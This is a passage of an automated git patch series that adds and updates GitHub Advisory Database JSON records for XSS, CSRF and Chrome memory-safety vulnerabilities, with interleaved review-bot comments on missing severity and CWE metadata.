"cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" 
diff --git a/advisories/unreviewed/2026/02/GHSA-pqpv-94jx-68vg/GHSA-pqpv-94jx-68vg.json b/advisories/unreviewed/2026/02/GHSA-pqpv-94jx-68vg/GHSA-pqpv-94jx-68vg.json new file mode 100644 index 0000000000000..18126d284b5b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pqpv-94jx-68vg/GHSA-pqpv-94jx-68vg.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqpv-94jx-68vg", + "modified": "2026-02-24T00:31:33Z", + "published": "2026-02-24T00:31:33Z", + "aliases": [ + "CVE-2026-3028" + ], + "details": "A vulnerability was determined in erzhongxmu JEEWMS up to 3.7. This vulnerability affects the function doAdd of the file src/main/java/com/jeecg/demo/controller/JeecgListDemoController.java. This manipulation of the argument Name causes cross site scripting. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3028" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347384" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347384" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756527" + }, + { + "type": "WEB", + "url": "https://www.notion.so/JEEWMS-Stored-Cross-Site-Scripting-XSS-in-SysModule-304ea92a3c418099bed7f1e0bca12d83" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T22:16:25Z" + } +} \ No newline at end of file 
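Review bot: In GHSA-pqpv-94jx-68vg.json the `details` text places the flaw in `doAdd` of `JeecgListDemoController.java` and does not say whether the script is stored or reflected, while the last reference URL is titled as a stored XSS in SysModule. If that write-up is the source for this CVE, the description should say "stored", since a stored payload reaches every later viewer of the record rather than one user following a link. If it describes a different component, the reference may belong to another entry. This needs checking against the linked report, which is not visible here.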
diff --git a/advisories/unreviewed/2026/02/GHSA-qvmx-rqmx-pvfg/GHSA-qvmx-rqmx-pvfg.json b/advisories/unreviewed/2026/02/GHSA-qvmx-rqmx-pvfg/GHSA-qvmx-rqmx-pvfg.json new file mode 100644 index 0000000000000..9ee27e51bca3e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvmx-rqmx-pvfg/GHSA-qvmx-rqmx-pvfg.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvmx-rqmx-pvfg", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2026-3061" + ], + "details": "Out of bounds read in Media in Google Chrome prior to 145.0.7632.116 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3061" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_23.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/482862710" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json b/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json index bbe7a802209ed..ed5eb046ed33e 100644 --- a/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json +++ b/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json 
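Review bot: GHSA-qvmx-rqmx-pvfg.json is added with `"severity": []` and a `database_specific.severity` of `null`, although `details` ends with "(Chromium security severity: High)"; until a vector arrives, anything that sorts or filters on severity treats this out-of-bounds read as unrated. The fixed version, 145.0.7632.116, is likewise only in the prose, with `affected` left empty. Consumers should match this record on the alias `CVE-2026-3061` and the version stated in `details` rather than on the structured fields.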
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r8fr-76pj-5h7j",
- "modified": "2026-02-20T18:31:36Z",
+ "modified": "2026-02-24T00:31:33Z",
 "published": "2026-02-20T18:31:36Z",
 "aliases": [
 "CVE-2025-69324"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms nex-forms-express-wp-form-builder allows Stored XSS.This issue affects NEX-Forms: from n/a through <= 9.1.7.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:19Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-rg2h-mq39-66pf/GHSA-rg2h-mq39-66pf.json b/advisories/unreviewed/2026/02/GHSA-rg2h-mq39-66pf/GHSA-rg2h-mq39-66pf.json
new file mode 100644
index 0000000000000..c4b31b84e91cc
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rg2h-mq39-66pf/GHSA-rg2h-mq39-66pf.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rg2h-mq39-66pf",
+ "modified": "2026-02-24T00:31:34Z",
+ "published": "2026-02-24T00:31:34Z",
+ "aliases": [
+ "CVE-2026-3043"
+ ],
+ "details": "A flaw has been found in itsourcecode Event Management System 1.0. The impacted element is an unknown function of the file /admin/navbar.php. Executing a manipulation of the argument page can lead to cross site scripting. The attack may be performed from remote. The exploit has been published and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3043"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ltranquility/cve_submit/issues/2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://itsourcecode.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347399"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347399"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757227"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T00:16:19Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json b/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json
index 497b1d0b4d452..90c74fab6a7e7 100644
--- a/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json
+++ b/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rv4c-25xc-4f6g",
- "modified": "2026-02-20T18:31:35Z",
+ "modified": "2026-02-24T00:31:33Z",
 "published": "2026-02-20T18:31:35Z",
 "aliases": [
 "CVE-2025-68848"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anmari amr cron manager amr-cron-manager allows Reflected XSS.This issue affects amr cron manager: from n/a through <= 2.3.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:13Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json b/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json
index f4067b6fd2983..f54adcc8f9bc8 100644
--- a/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json
+++ b/advisories/unreviewed/2026/02/GHSA-rw5q-r997-qm48/GHSA-rw5q-r997-qm48.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rw5q-r997-qm48",
- "modified": "2026-02-20T18:31:37Z",
+ "modified": "2026-02-24T00:31:33Z",
 "published": "2026-02-20T18:31:37Z",
 "aliases": [
 "CVE-2025-69389"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hugh Mungus Visitor Maps Extended Referer Field visitor-maps-extended-referer-field allows Reflected XSS.This issue affects Visitor Maps Extended Referer Field: from n/a through <= 1.2.6.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:24Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json b/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json
index 728988ddf6b00..15bbe99305c24 100644
--- a/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json
+++ b/advisories/unreviewed/2026/02/GHSA-v534-r4rj-rcvf/GHSA-v534-r4rj-rcvf.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-v534-r4rj-rcvf",
- "modified": "2026-02-20T18:31:35Z",
+ "modified": "2026-02-24T00:31:33Z",
 "published": "2026-02-20T18:31:35Z",
 "aliases": [
 "CVE-2025-68845"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in aThemeArt Translations eDS Responsive Menu eds-responsive-menu allows Reflected XSS.This issue affects eDS Responsive Menu: from n/a through <= 1.2.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:13Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json b/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json
index e3a4eb2776bd6..7efb26e12481a 100644
--- a/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json
+++ b/advisories/unreviewed/2026/02/GHSA-vjvc-9fxm-2xw8/GHSA-vjvc-9fxm-2xw8.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vjvc-9fxm-2xw8",
- "modified": "2026-02-20T18:31:36Z",
+ "modified": "2026-02-24T00:31:33Z",
 "published": "2026-02-20T18:31:36Z",
 "aliases": [
 "CVE-2025-69368"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes SOHO - Photography WordPress Theme soho allows DOM-Based XSS.This issue affects SOHO - Photography WordPress Theme: from n/a through <= 3.0.3.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:21Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-vmmw-c3hw-gvm3/GHSA-vmmw-c3hw-gvm3.json b/advisories/unreviewed/2026/02/GHSA-vmmw-c3hw-gvm3/GHSA-vmmw-c3hw-gvm3.json
new file mode 100644
index 0000000000000..60519900350be
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-vmmw-c3hw-gvm3/GHSA-vmmw-c3hw-gvm3.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vmmw-c3hw-gvm3",
+ "modified": "2026-02-24T00:31:34Z",
+ "published": "2026-02-24T00:31:34Z",
+ "aliases": [
+ "CVE-2026-3062"
+ ],
+ "details": "Out of bounds read and write in Tint in Google Chrome on Mac prior to 145.0.7632.116 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3062"
+ },
+ {
+ "type": "WEB",
+ "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_23.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://issues.chromium.org/issues/483751167"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T23:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json b/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json
index bf5b830a16403..11d880dc390d2 100644
--- a/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json
+++ b/advisories/unreviewed/2026/02/GHSA-vph5-6p6f-8xpf/GHSA-vph5-6p6f-8xpf.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vph5-6p6f-8xpf",
- "modified": "2026-02-20T18:31:34Z",
+ "modified": "2026-02-24T00:31:32Z",
 "published": "2026-02-20T18:31:34Z",
 "aliases": [
 "CVE-2025-68031"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in faraz sms افزونه پیامک حرفه ای فراز اس ام اس farazsms allows Reflected XSS.This issue affects افزونه پیامک حرفه ای فراز اس ام اس: from n/a through <= 2.7.3.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
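Review bot: In GHSA-vmmw-c3hw-gvm3.json, `"cwe_ids": []` leaves the record unclassified even though its details text describes an out-of-bounds read and write; the sibling Chrome record GHSA-qvmx-rqmx-pvfg added earlier in this patch carries `"CWE-125"`. If the sync is allowed to derive the class from the description, `"cwe_ids": ["CWE-125", "CWE-787"]` would match what the text states. Both Chrome records also ship an empty `severity` array and `"severity": null` while the text quotes a Chromium rating of High, so anything that triages on `database_specific.severity` should treat null as unscored rather than as low priority until a CVSS vector arrives.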
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:08Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json b/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json
index a2c559792d9ce..8079f95fec16d 100644
--- a/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json
+++ b/advisories/unreviewed/2026/02/GHSA-w7wv-fvvq-ppfp/GHSA-w7wv-fvvq-ppfp.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-w7wv-fvvq-ppfp",
- "modified": "2026-02-20T18:31:35Z",
+ "modified": "2026-02-24T00:31:33Z",
 "published": "2026-02-20T18:31:35Z",
 "aliases": [
 "CVE-2025-68852"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webmuehle Court Reservation court-reservation allows Reflected XSS.This issue affects Court Reservation: from n/a through <= 1.10.9.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:13Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json b/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json
index b108256ae4364..6687d3537ab09 100644
--- a/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json
+++ b/advisories/unreviewed/2026/02/GHSA-wf36-8q2p-m2xg/GHSA-wf36-8q2p-m2xg.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wf36-8q2p-m2xg",
- "modified": "2026-02-20T18:31:33Z",
+ "modified": "2026-02-24T00:31:32Z",
 "published": "2026-02-20T18:31:33Z",
 "aliases": [
 "CVE-2025-53231"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdevstudio Easy Taxonomy Images easy-taxonomy-images allows Stored XSS.This issue affects Easy Taxonomy Images: from n/a through <= 1.0.1.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:01Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-wg93-hp69-vv5w/GHSA-wg93-hp69-vv5w.json b/advisories/unreviewed/2026/02/GHSA-wg93-hp69-vv5w/GHSA-wg93-hp69-vv5w.json
new file mode 100644
index 0000000000000..c8606d368384d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wg93-hp69-vv5w/GHSA-wg93-hp69-vv5w.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wg93-hp69-vv5w",
+ "modified": "2026-02-24T00:31:33Z",
+ "published": "2026-02-24T00:31:33Z",
+ "aliases": [
+ "CVE-2026-27742"
+ ],
+ "details": "Bludit version 3.16.2 contains a stored cross-site scripting (XSS) vulnerability in the post content functionality. The application performs client-side sanitation of content input but does not enforce equivalent sanitation on the server side. An authenticated user can inject arbitrary JavaScript into the content field of a post, which is stored and later rendered to other users without proper output encoding. When viewed, the injected script executes in the context of the victim’s browser, allowing session hijacking, credential theft, content manipulation, or other actions within the user’s privileges.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27742"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/bludit/bludit/issues/1579"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/bludit-stored-xss-in-post-content"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T22:16:25Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json b/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json
index 63ac5f6018190..1a79678c1149c 100644
--- a/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json
+++ b/advisories/unreviewed/2026/02/GHSA-x6m2-4qvv-ghf6/GHSA-x6m2-4qvv-ghf6.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-x6m2-4qvv-ghf6",
- "modified": "2026-02-20T18:31:36Z",
+ "modified": "2026-02-24T00:31:33Z",
 "published": "2026-02-20T18:31:36Z",
 "aliases": [
 "CVE-2025-69367"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes Oyster - Photography WordPress Theme oyster allows DOM-Based XSS.This issue affects Oyster - Photography WordPress Theme: from n/a through <= 4.4.3.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:20Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json b/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json
index e723a1688579b..ac16b42635239 100644
--- a/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json
+++ b/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xg7c-7v8p-8ww8",
- "modified": "2026-02-20T18:31:36Z",
+ "modified": "2026-02-24T00:31:33Z",
 "published": "2026-02-20T18:31:35Z",
 "aliases": [
 "CVE-2025-69302"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes DesignThemes Core Features designthemes-core-features allows Reflected XSS.This issue affects DesignThemes Core Features: from n/a through <= 2.3.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:18Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-xw6c-ffpm-fgcm/GHSA-xw6c-ffpm-fgcm.json b/advisories/unreviewed/2026/02/GHSA-xw6c-ffpm-fgcm/GHSA-xw6c-ffpm-fgcm.json
new file mode 100644
index 0000000000000..d1f57ae140ab9
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xw6c-ffpm-fgcm/GHSA-xw6c-ffpm-fgcm.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xw6c-ffpm-fgcm",
+ "modified": "2026-02-24T00:31:33Z",
+ "published": "2026-02-24T00:31:33Z",
+ "aliases": [
+ "CVE-2026-27741"
+ ],
+ "details": "Bludit version 3.16.1 contains a cross-site request forgery (CSRF) vulnerability in the /admin/uninstall-plugin/ and /admin/install-theme/ endpoints. The application does not implement anti-CSRF tokens or other request origin validation mechanisms for these administrative actions. An attacker can induce an authenticated administrator to visit a malicious page that silently submits crafted requests, resulting in unauthorized plugin uninstallation or theme installation. This may lead to loss of functionality, execution of untrusted code via malicious themes, and compromise of system integrity.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27741"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/bludit/bludit/issues/1577"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/bludit-csrf-in-plugin-and-theme-management-endpoints"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T22:16:25Z"
+ }
+}
\ No newline at end of file
From bb981588c8b36ca53f26b77c76bee14f49e24e7d Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 03:31:35 +0000 Subject: [PATCH 73/77] Publish Advisories GHSA-2fmw-p7gw-97jj GHSA-38jp-gj76-pm7x GHSA-47ph-5j6m-fmgx GHSA-57jm-2xq8-jwj3 GHSA-7w2h-4285-9pwr GHSA-934v-v4wh-rf2c GHSA-cqj6-j4f4-mcpp GHSA-f256-j3x2-h7wh GHSA-fj46-cfm8-7pc4 GHSA-m8fj-fqgq-fj22 GHSA-mg73-f2jm-wph7 GHSA-qhmq-843h-9vq8 GHSA-r8mv-7fwh-cfvr GHSA-v2vh-hr2h-f29r GHSA-vq86-4hgw-x482 GHSA-vv96-h3xf-q33j GHSA-w3pf-j6xr-fj68 GHSA-x6c4-87pg-m84f GHSA-xqg5-5x64-93r9 --- .../GHSA-2fmw-p7gw-97jj.json | 36 +++++++++++ .../GHSA-38jp-gj76-pm7x.json | 52 ++++++++++++++++ .../GHSA-47ph-5j6m-fmgx.json | 48 +++++++++++++++ .../GHSA-57jm-2xq8-jwj3.json | 56 +++++++++++++++++ .../GHSA-7w2h-4285-9pwr.json | 36 +++++++++++ .../GHSA-934v-v4wh-rf2c.json | 36 +++++++++++ .../GHSA-cqj6-j4f4-mcpp.json | 60 +++++++++++++++++++ .../GHSA-f256-j3x2-h7wh.json | 56 +++++++++++++++++ .../GHSA-fj46-cfm8-7pc4.json | 36 +++++++++++ .../GHSA-m8fj-fqgq-fj22.json | 36 +++++++++++ .../GHSA-mg73-f2jm-wph7.json | 36 